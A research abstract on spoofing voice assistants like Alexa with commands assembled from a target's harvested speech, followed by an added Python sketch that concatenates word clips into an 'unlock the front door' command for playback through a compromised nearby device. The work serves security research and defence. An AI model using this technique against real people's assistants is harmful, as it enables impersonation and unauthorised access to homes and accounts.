Recent advances in voice synthesis, coupled with the ease with which speech can be harvested for millions of people, introduce new threats to applications enabled by devices such as voice assistants (e.g., Amazon Alexa, Google Home). We explore whether a limited amount of unrelated speech from a target can be used to synthesize commands for a voice assistant like Amazon Alexa. More specifically, we investigate synthetic-command attacks on voice assistants that match the source of a command to an authorized user, and on applications (e.g., Alexa Skills) that process a command only when its source is identified as an authorized user with a chosen confidence level. We demonstrate that even simple concatenative speech synthesis can be used by an attacker to command voice assistants to perform sensitive operations. We also show that such attacks, when launched by exploiting compromised devices in the vicinity of voice assistants, can leave a relatively small host and network footprint. Our results demonstrate the need for better defenses against synthetic malicious commands that could target voice assistants.
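As a concrete illustration (not taken from the paper), the sketch below shows the kind of simple concatenative synthesis the abstract refers to: stitching word-level clips, previously cut from unrelated harvested recordings of the target, into a playable command. All file names are hypothetical, and pydub is assumed only for convenience.

```python
# A minimal sketch of concatenative speech synthesis, assuming the attacker
# has already segmented harvested speech from the target into per-word WAV
# clips. File names below are hypothetical placeholders.
from pydub import AudioSegment

# Word-level units cut from unrelated recordings of the target.
units = ["alexa.wav", "unlock.wav", "the.wav", "front.wav", "door.wav"]

command = AudioSegment.silent(duration=200)  # short lead-in pause (ms)
for clip in units:
    command += AudioSegment.from_wav(clip)
    command += AudioSegment.silent(duration=60)  # inter-word gap (ms)

# The resulting file would then be played by a compromised device
# in the vicinity of the voice assistant.
command.export("synthetic_command.wav", format="wav")
```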